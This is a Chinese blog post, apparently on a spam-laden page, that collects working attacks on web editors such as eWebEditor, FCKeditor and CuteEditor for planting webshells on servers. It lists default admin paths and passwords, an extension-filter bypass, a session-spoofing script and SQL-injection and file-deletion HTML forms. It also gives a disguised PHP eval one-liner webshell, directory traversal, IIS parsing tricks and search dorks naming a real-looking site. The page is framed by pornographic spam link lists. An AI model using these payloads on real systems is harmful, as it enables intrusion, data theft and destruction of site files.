亚洲免费在线-亚洲免费在线播放-亚洲免费在线观看-亚洲免费在线观看视频-亚洲免费在线看-亚洲免费在线视频

各種在線編輯器漏洞

系統 2008 0

?

?

常見的一些編輯器:ewebeditor ewebeditornet fckeditoreditor southidceditor SouthidcEditor bigcneditor


其實如果大家多關注編輯器的話,會有驚人的發現,尤其是jsp,php版的,一個webshell基本上就是一臺服務器啊~~~

一:首先說說最近不斷爆洞的ewebeditor

(一)ASP版

/webeditor/dialog/about.htm 查看版本

1:默認管理后臺:

http://www.test.com/ewebeditor/admin_login.asp

后臺如果能進入:

可點擊樣式管理:

standard 拷貝一份(直接修改改不了)

在拷貝的一份里加入圖片類型( asa aaspsp ) 然后點預覽

在編輯器里點設計 然后直接上傳asa大馬.

上傳后 在代碼里可以看到馬的位置!

(原理:因為在iis里 網站的屬性里 應用程序配置一項 asa擴展名還是用asp.dll來解析的,asp也是 還有 cer cdx )

在cer cdx asa的被刪掉 那么馬兒就找不到 映射不過去.

可以在拷貝過后的樣式 圖片類型里加入 aaspsp 然后在上傳 直接就可以上傳asp文件


2:下載默認數據庫

www.test.com/ewebeditor/db/ewebeditor.mdb

然后分析數據庫

webeditor_system(1) 就可以看到用戶名和密碼 如果破解不出來

可以在webeditor_style(14 樣式表里

主要看允許上傳文件的擴展名(s-fileext s_ingeext)

看到一個小黑客曾經搞過 多了asa aaspsp

可以用他來利用!(后臺找不到的情況下也可以用此方法)

可以構造語句:

比如 ID=46 s-name =standard1

構造 代碼: ewebeditor.asp?id=content&style=standard

ID和和樣式名改過后

ewebeditor.asp?id=46&style=standard1


然后就是進入編輯器 上傳asa 或者asp的 得到webshell

前面的1跟2說的是asp版的ewebeditor,其他如php,jsp跟asp的差不多,這里不多說.

針對這種方法可能出現的問題:

(1).使用默認用戶名和密碼無法登錄。
請試試直接下載db目錄下的ewebeditor.mdb文件,用戶名和密碼在eWebEditor_System表中,經過了md5加密,如果無法下載或者無法****,那就當自己的運氣不好了。
(2).加了asa類型后發現還是無法上傳。
應該是站長懂點代碼,自己修改了Upload.asp文件,但是沒有關系,按照常人的思維習慣,往往會直接在sAllowExt = Replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看見過一個站長是這樣修改的:
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
猛一看什么都過濾了,但是我們只要在上傳類型中增加“aaspsp”,就可以直接上傳asp文件了。呵呵,是不是天才的想法?“aaspsp”過濾了“asp”字符后,反而變成了“asp”!順便告訴大家一個秘密,其實動網論壇7.0 sp2中也可以利用類似的方法繞過對擴展名的過濾。
(3).上傳了asp文件后,卻發現該目錄沒有運行腳本的權限。
呵呵,真是好笨啊,上傳類型可以改,上傳路徑不是也可以修改的嗎?

(4).已經使用了第2點中的方法,但是asp類型還是無法上傳。
看來站長肯定是一個寫asp的高手,但是我們還有最后一招來對付他:看到“遠程類型”了嗎?eWebEditor能夠設定自動保存遠程文件的類型,我們可以加入asp類型。但是如何才能讓遠程訪問的asp文件能夠以源碼形式保存呢?方法是很多的,最簡單的方法是將IIS中的“應用文件映射”中的“asp”刪除。

漏洞原理
漏洞的利用原理很簡單,請看Upload.asp文件:
任何情況下都不允許上傳asp腳本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
因為eWebEditor僅僅過濾了ASP文件。記得我第一次使用eWebEditor時就在納悶:既然作者已經知道asp文件需要過濾,為什么不同時過濾asa、cer等文件呢?也許這就是對免費用戶不負責任的表現吧!

3.eWebEditor session欺騙漏洞

eWebEditor在線編輯器

漏洞文件:Admin_Private.asp

漏洞語句:<%

If Session("eWebEditor_User") = "" Then

Response.Redirect "admin_login.asp"

Response.End

End If

只判斷了session,沒有判斷cookies和路徑的驗證問題。

漏洞利用:

新建一個h4x0r.asp內容如下:

<%Session("eWebEditor_User") = "11111111"%>

訪問h4x0r.asp,再訪問后臺任何文件,for example:Admin_Default.asp

漏洞影響:虛擬主機的克星.

4.ewebeditor asp版 2.1.6 上傳漏洞

<H1>ewebeditor asp版 2.1.6 上傳漏洞利用程序</H1><br>

<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">

<input type=file name=uploadfile size=100><br><br>

<input type=submit value=Fuck>

</form>

http://127.1/e/upload.asp

上傳時修改此處上傳地址。。。

如果你是上傳的asp文件則成功后的地址為:

http://127.1/e/uploadfile/xxxxxxxxxx.asp

5.ewebeditor遍歷路徑漏洞
Ewebeditor為非常常見的網站核心程序,
默認數據庫為 /db/ewebeditor.mdb 默認路徑admin_login.asp 默認管理員admin密碼admin(admin888)

ewebedit進入后臺添加樣式.得到webshell很容易. 有時候很不幸.管理員把數據庫改為只讀權限.

但是ewebeditor后臺有個小小的缺陷. 可以歷遍整個網站目錄. 當然.數據庫為只讀的時候一樣可以利用.

上傳文件管理---選擇樣式目錄(隨便選一個目錄)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整個網站文件了

6.eweb2.7版本以下又一個注入

首先看代碼(ewebeditor.asp):
ub InitPara()
' 取全屏標志
sFullScreen = Trim(Request.QueryString("fullscreen"))
' 取對應的內容ID
sContentID = Trim(Request.QueryString("id"))
If sContentID = "" Then ShowErr "請傳入調用參數ID,即隱藏的內容表單項ID!"

' 取樣式初始值
sStyleName = Trim(Request.QueryString("style"))
If sStyleName = "" Then sStyleName = "standard"

sSql = "select * from ewebeditor_style where s_name='" & sStyleName & "'"
oRs.Open sSql, oConn, 0, 1
If Not oRs.Eof Then
sStyleID = oRs("S_ID")
sStyleName = oRs("S_Name")
sStyleDir = oRs("S_Dir")
sStyleCSS = oRs("S_CSS")
sStyleUploadDir = oRs("S_UploadDir")
nStateFlag = oRs("S_StateFlag")
sDetectFromWord = oRs("S_DetectFromWord")
sInitMode = oRs("S_InitMode")
sBaseUrl = oRs("S_BaseUrl")

sStyleUploadDir = Replace(sStyleUploadDir, "\", "/")
If Right(sStyleUploadDir, 1) <> "/" Then
sStyleUploadDir = sStyleUploadDir & "/"
End If
Else
ShowErr "無效的樣式Style參數傳入,如果要使用默認值,請留空!"
End If
oRs.Close
關鍵的是這兩句:
sStyleName = Trim(Request.QueryString("style"))
If sStyleName = "" Then sStyleName = "standard"

sSql = "select * from ewebeditor_style where s_name='" & sStyleName & "'"
很明顯的是style參數沒有足夠的過濾,如果我們自己給這個地方賦值的話,程序會報錯的,



但接下來的一句還是讓我們有可乘之機,If sStyleName = "" Then sStyleName = "standard"保留默認的還是會帶入語句執行,加個單引號就報錯了,如圖2.[local]1[/local]
我試了好幾款工具,發現只有pangolin可以注入,啊D只能發現注入不能繼續猜解。
eweb默認的管理員表是:ewebeditor_system
這個表下的默認兩個列名為:sys_UserName和sys_userpass
需要手動添加,

7.ewebeditor2.8最終版刪除任意文件漏洞

這個漏洞可以很雞肋,也可以很致命,關鍵看你怎么利用!

此漏洞存在于ExampleNewsSystem目錄下的delete.asp文件中,這是ewebeditor的測試頁面,無須登陸可以直接進入,看這些代碼:

' 把帶"|"的字符串轉為數組
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, "|")
' 刪除新聞相關的文件,從文件夾中
Dim i
For i = 0 To UBound(aSavePathFileName)
' 按路徑文件名刪除文件
Call DoDelFile(aSavePathFileName(i))
Next

而aSavePathFileName是前面從數據庫取出來的:

sSavePathFileName = oRs("D_SavePathFileName")

看看D_SavePathFileName是怎么添加到數據庫里的,在addsave.asp(modifysave.asp)里:

sSavePathFileName = GetSafeStr(Request.Form("d_savepathfilename"))
...
oRs("D_SavePathFileName") = sSavePathFileName

居然過濾了,是GetSafeStr函數,再看看這個函數,在Startup.asp里:

Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), "'", ""), Chr(34), ""), ";", "")
End Function

無語,這不是過濾字符型注入的函數么?放這里什么用也沒有啊!既然路徑沒有過濾,那就可以直接定義了,構造一個提交頁面,其中d_savepathfilename自己任意賦值(要刪除多個文件,用|隔開即可)。試試../../eWebEditor.asp,提交后刪除該新聞,于是主目錄下的eWebEditor.asp不見了!

下面給出利用的htm:
<HTML><HEAD><TITLE>eWebEditor刪除文件 by:oldjun(http://www.oldjun.com)</TITLE>
<style>body,p,td,input {font-size:9pt}</style>
</HEAD><BODY><a href='list.asp'>新聞列表</a> | <a href='add.asp'>增加新聞</a>

<b>增加新聞</b>

<form action="http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"
method="post" name="myform">
<input type=hidden name=d_originalfilename>
<input type=hidden name=d_savefilename>
<table cellspacing=3 align=center>
<tr><td>要刪的文件(相對路徑就可以了):</td>
<td><input type="text" name="d_savepathfilename" value="" size="90"></td>
</tr>
<tr><td>新聞標題(隨便填):</td>
<td><input type="text" name="d_title" value="" size="90"></td>
</tr>
<tr><td>標題圖片:</td>
<td><select name="d_picture" size=1><option value=''>無</option></select>
當編輯區有插入圖片時,將自動填充此下拉框</td>
</tr>
<tr><td>新聞內容(隨便填):</td>
<td><textarea name="d_content"></textarea></td>
</tr>
</table>

<input type=submit name=btnSubmit value=" 提 交 ">
<input type=reset name=btnReset value=" 重 填 ">
</form>
</BODY></HTML>

(二)ASPX版:

受影響文件:eWebEditorNet/upload.aspx

利用方法:添好本地的cer的Shell文件。在瀏攬器輸入javascript:lbtnUpload.click();就能得到shell

嘿嘿....繞過了限制......成功的上傳了ASPX文件....

文件默認的上傳后保存的地址是eWebEditorNet/UploadFile/現在來看看是否上傳成功.....

(三)PHP版

關于eWebEditor 漏洞php版本的和asp的一樣。有目錄瀏覽。和編輯擴展名。重點在于雖然支持了php格式但上傳還是上傳不了。不過利用織夢的gif89a漏洞倒可以實現php一句話上傳,然后再上傳webshell。

備注:織夢的gif89a漏洞,準確來說應該是DEDECMS中所用的php版的FCKeditor存在上傳漏洞,gif89a文件頭欺騙。DEDECMS中在上傳拖上沒有對picSubmit進行任何處理。但是卻不能直接上傳php馬。因為會識別。使用修改過的php小馬。

gif89a

<?php

phpinfo();

?>

RFI

gif89a

<?php

eval($_POST[c]);

?>

利用gif89a進行了欺騙。現在上傳就可以成功了.然后有php一句話客戶端連接.

(四)JSP版

上傳漏洞

影響版本:漏洞存在于ewebeditor jsp版 1.4以下版本,漏洞有兩個版本。

原理:第一個是使用savefile.jsp來進行 文件上傳 操作的,從代碼中可以看出,程序并沒做任何上傳過濾,這樣我們就可以直接上傳一個JSPShell了。另一個版本可能是被人修改過,把代碼轉成了servlet,不能看到代碼,但是利用方法卻大同小異。

利用方法:我們先找一個1.4版本以下的ewebeditor JSP上傳頁面,選擇好一個JSPShell。這個ewebeditor是沒有提交按鈕的,所以這里涉及到一個小技巧,就是在上傳的對話框中敲下回車,大約過半分鐘,就可以查看網頁的源文件來尋找我們的Webshell了。

這個JSP和PHP一樣,如果系統權限沒有特意去設置的話,默認我們得到webshell是system的權限,那么...^_^

二:ewebeditornet 漏洞利用

默認上傳地址:

www.test.com/ewebeditornet/upload.aspx


可以直接上傳一個cer的木馬

在無法上傳的情況下

可以地址欄構造以下代碼: javascript:lbtnUpload.click();

然后查看源代碼:

找到uploadsave 找到地址

默認傳到uploadfile這個文件夾里

(漏洞修補: 可以在iss里直接把upload文件夾的執行權限選擇無. )

三:fckeditor 漏洞利用

http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/
就把文件名字段改成NEWfile 選擇文件名可定義
上傳過后在/userfiles/image/找文件

上傳任意文件:

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

根據網站所使用不同語言自己改這個地址.

FCKeditor的JSP版漏洞

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
上傳shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

四:southidceditor

1.

http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb

http://www.xhkjit.com/admin/southidceditor/popup.asp

http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp

2.southidceditor存在一個可以抓包上傳的漏洞

Google:inurl:(admin/SouthidcEditor/PopUp.asp)

nc抓包自己玩玩吧.


五:bigcneditor(這個我沒有找到具體的漏洞,網上的文章也都比較不負責任,誰知道的請告訴我下,謝謝)

這個頁不多說了

原理都差不多!

防范方法很簡單就不多講了,

六:CuteEditor編輯器通殺漏洞

CuteEditor編輯器是.NET下最常用的一個編輯器..
十分的強大..也許是因為他太強了 HEHE ..
我們隨便找到一個裝有此編輯器的網站 點擊插入圖片 FLASH 影音文件 什么的都可以出來一個對話框.
在這個對話框里可以游覽用戶所上傳的數據還有目錄..郁悶的是居然可以新建..移動..修改..
在官網上甚至連刪除都弄出來了..呵呵.. 我們這次主要是利用2003服務器的特性來進行利用..
大家都知道在2003的IIS環境下 如果你建一個 XXX.asp 文件夾的話 里面不管放什么其他類型的文件
在IIS里都會通過文件夾名的類型來解析 也就是說你傳一個JPG的東西到 XXX.ASP下也會以ASP腳本
來進行解析..我們這里就利用他這一特性...首先我們隨便找一個編輯器 然后選擇插入圖片吧(如圖1)..插入其他的
東西都行..只要能新建文件目錄..或者可以移動目錄..

看這里就有新建文件夾等等一些操作的按鈕我們新建一個..如果新建不能用可以試試移動文件夾把以有的文件夾名改成 XXX.asp形式..


好了.我們新建一個 www.asp 文件夾.


確定..我們的文件夾就建好了..然后點擊進入該文件夾 (

然后到了最關鍵的...我們上傳文件..
用插入圖片是上傳不了的..他會檢測是不是正常的圖片..
可以試試 插入 FLASH
或者插入 視頻 音樂文件..我們這里就插入視頻.. 然后直接把 我們要傳上去的馬后綴改為 .avi形式

然后進入我們剛才新建的那個目錄 然后上傳 .. 文件就上去了

?

本文由 殘劍 進行整理編輯,轉載請注明出處。

?

各種在線編輯器漏洞


更多文章、技術交流、商務合作、聯系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號聯系: 360901061

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對您有幫助就好】

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長會非常 感謝您的哦!!!

發表我的評論
最新評論 總共0條評論
主站蜘蛛池模板: 亚洲视频精品在线 | 久久久国产精品视频 | 国产精品午夜波多野结衣性色 | 精品国产乱码久久久久久浪潮 | 一级片视频免费看 | 久久国内精品 | 久久亚洲精品国产精品婷婷 | 国产成人精品免费视频网页大全 | 日韩免费一级片 | 伊人成年综合网 | 青草社区在线观看 | 日本精品久久久久中文字幕2 | 黄色在线观看视频免费 | 久久精品国产影库免费看 | 国产精品视频公开费视频 | 全免费一级午夜毛片 | 久操免费在线 | 久久国产精品久久久久久久久久 | 欧美美女被爆操 | 甜心女孩泰剧在线观看 | 国产免费久久 | 超清波多野结衣精品一区 | 99热久久久久久久免费观看 | 婷婷在线免费视频 | 香蕉网视频 | 精品一区二区三区18 | 久久精品一区二区三区不卡牛牛 | 成人毛片免费在线观看 | 性做久久久久久网站 | 在线观看a视频 | 深夜免费视频 | 狠狠躁日日躁人人爽 | 欧美亚洲高清 | 亚洲欧美另类综合 | 强制高潮18xxxxhd日韩 | 四虎影视免费观看免费观看 | 色综合中文字幕在线亚洲 | 国产农村妇女一级毛片 | 成人免费黄网站 | 玖玖在线资源站 | 99久久99久久 |